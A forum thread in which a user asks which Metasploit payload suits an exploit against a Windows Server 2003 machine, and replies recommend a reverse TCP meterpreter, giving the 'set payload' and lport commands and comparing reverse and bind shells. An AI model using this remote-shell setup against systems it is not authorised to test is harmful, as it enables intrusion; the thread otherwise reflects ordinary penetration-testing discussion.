a question about metasploit

Viewing 8 reply threads
  • Author
    • #7027
      midnight monster

      Hello there!
      i have a problem witn metasploit i dont wich of payloads is best for my exploit ( i know the server vulnerabilite and i sure about my expliot )and when i use “show payloads” command i see a lot of compatible payloads please help me to find the best payload

    • #43613

      The “best” payload to use will depend on you scenario.


    • #43614

      Try each one and see which works best for you! That’s part of the fun of Metasploit. For each one that doesn’t work try to find out why!


    • #43615

      As previously mentioned we don’t know your environment, or your target for that matter.

      If it’s within a local lab environment, targeting a Windows system, give the reverse meterpreter a try…

      set payload windows/meterpreter/reverse_tcp
      set lhost
      set lport 8888

    • #43616
      midnight monster

      oh steve are you kiding!! it has hundred compatible payload and it takes a lot of time for me

    • #43617

      @midnight monster wrote:

      oh steve are you kiding!! it has hundred compatible payload and it takes a lot of time for me

      OK. What is the server OS and vulnerability? If it’s Windows then Meterpereter (as mentioned by BILLV) is always a favorite of mine.


    • #43618

      On Windows, a meterpreter is always better because all windows post modules support it (plus tons of features).  It also communicates in SSL, so that adds a bit more stealth.  On Linux though, it’s a different story, honestly you’re probably better off with a non-meterpreter shell, because the Linux meterpreter isn’t as good as the windows one.

      reverse vs bind… come to think about it, I almost never use bind these days on a machine behind a firewall.  But people do use bind shells.

      By the way, when you select an exploit, and do “show payloads” — that will only show all the payloads compatible with that particular exploit.  If you’re testing a web app exploit, keep in mind php/exec might not return an output (even though the command ran successfully).

      If you’re still clueless about which payload to use, just use a reverse meterpreter like everybody else has been recommending.

      Lastly, perhaps you should consider asking Metasploit questions on #metasploit in freenode, so the actual metasploit dev team can answer your questions more quickly.

      And yes… I did sign up for an account here just to answer your question.

    • #43619
      midnight monster

      Thank you msfsinn3r your info was very useful for me
      my sever is windows server 2003
      and thanks alot

    • #43620

      btw you can use search commend to get selected exploits , like “search smb” . try it and lemme know 🙂

Viewing 8 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.


Sign in with Caendra

Forgot password?Sign up

Forgot your details?